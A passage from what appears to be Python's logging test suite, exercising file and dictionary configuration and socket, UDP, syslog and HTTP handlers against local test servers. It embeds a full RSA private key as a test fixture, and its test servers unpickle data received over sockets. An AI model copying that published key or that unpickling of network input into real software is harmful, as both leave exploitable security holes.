class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('foo')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestTCPServer(addr, self.handle_socket,
0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.SocketHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Kill the server
self.server.stop(2.0)
#The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertTrue(self.sock_hdlr.retryTime > now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram, 0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.DatagramHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram,
0.01)
server.start()
server.ready.wait()
self.sl_hdlr = logging.handlers.SysLogHandler(('localhost',
server.port))
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
PEMFILE = """-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDGT4xS5r91rbLJQK2nUDenBhBG6qFk+bVOjuAGC/LSHlAoBnvG
zQG3agOG+e7c5z2XT8m2ktORLqG3E4mYmbxgyhDrzP6ei2Anc+pszmnxPoK3Puh5
aXV+XKt0bU0C1m2+ACmGGJ0t3P408art82nOxBw8ZHgIg9Dtp6xIUCyOqwIDAQAB
AoGBAJFTnFboaKh5eUrIzjmNrKsG44jEyy+vWvHN/FgSC4l103HxhmWiuL5Lv3f7
0tMp1tX7D6xvHwIG9VWvyKb/Cq9rJsDibmDVIOslnOWeQhG+XwJyitR0pq/KlJIB
5LjORcBw795oKWOAi6RcOb1ON59tysEFYhAGQO9k6VL621gRAkEA/Gb+YXULLpbs
piXN3q4zcHzeaVANo69tUZ6TjaQqMeTxE4tOYM0G0ZoSeHEdaP59AOZGKXXNGSQy
2z/MddcYGQJBAMkjLSYIpOLJY11ja8OwwswFG2hEzHe0cS9bzo++R/jc1bHA5R0Y
i6vA5iPi+wopPFvpytdBol7UuEBe5xZrxWMCQQCWxELRHiP2yWpEeLJ3gGDzoXMN
PydWjhRju7Bx3AzkTtf+D6lawz1+eGTuEss5i0JKBkMEwvwnN2s1ce+EuF4JAkBb
E96h1lAzkVW5OAfYOPY8RCPA90ZO/hoyg7PpSxR0ECuDrgERR8gXIeYUYfejBkEa
rab4CfRoVJKKM28Yq/xZAkBvuq670JRCwOgfUTdww7WpdOQBYPkzQccsKNCslQW8
/DyW6y06oQusSENUvynT6dr3LJxt/NgZPhZX2+k1eYDV
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICGzCCAYSgAwIBAgIJAIq84a2Q/OvlMA0GCSqGSIb3DQEBBQUAMBQxEjAQBgNV
BAMTCWxvY2FsaG9zdDAeFw0xMTA1MjExMDIzMzNaFw03NTAzMjEwMzU1MTdaMBQx
EjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
xk+MUua/da2yyUCtp1A3pwYQRuqhZPm1To7gBgvy0h5QKAZ7xs0Bt2oDhvnu3Oc9
l0/JtpLTkS6htxOJmJm8YMoQ68z+notgJ3PqbM5p8T6Ctz7oeWl1flyrdG1NAtZt
vgAphhidLdz+NPGq7fNpzsQcPGR4CIPQ7aesSFAsjqsCAwEAAaN1MHMwHQYDVR0O
BBYEFLWaUPO6N7efGiuoS9i3DVYcUwn0MEQGA1UdIwQ9MDuAFLWaUPO6N7efGiuo
S9i3DVYcUwn0oRikFjAUMRIwEAYDVQQDEwlsb2NhbGhvc3SCCQCKvOGtkPzr5TAM
BgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAMK5whPjLNQK1Ivvk88oqJqq
4f889OwikGP0eUhOBhbFlsZs+jq5YZC2UzHz+evzKBlgAP1u4lP/cB85CnjvWqM+
1c/lywFHQ6HOdDeQ1L72tSYMrNOG4XNmLn0h7rx6GoTU7dcFRfseahBCq8mv0IDt
IRbTpvlHWPjsSvHz0ZOH
-----END CERTIFICATE-----"""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
fd, fn = tempfile.mkstemp()
os.close(fd)
with open(fn, 'w') as f:
f.write(self.PEMFILE)
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(fn)
os.unlink(fn)
except ImportError:
sslctx = None
else:
sslctx = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
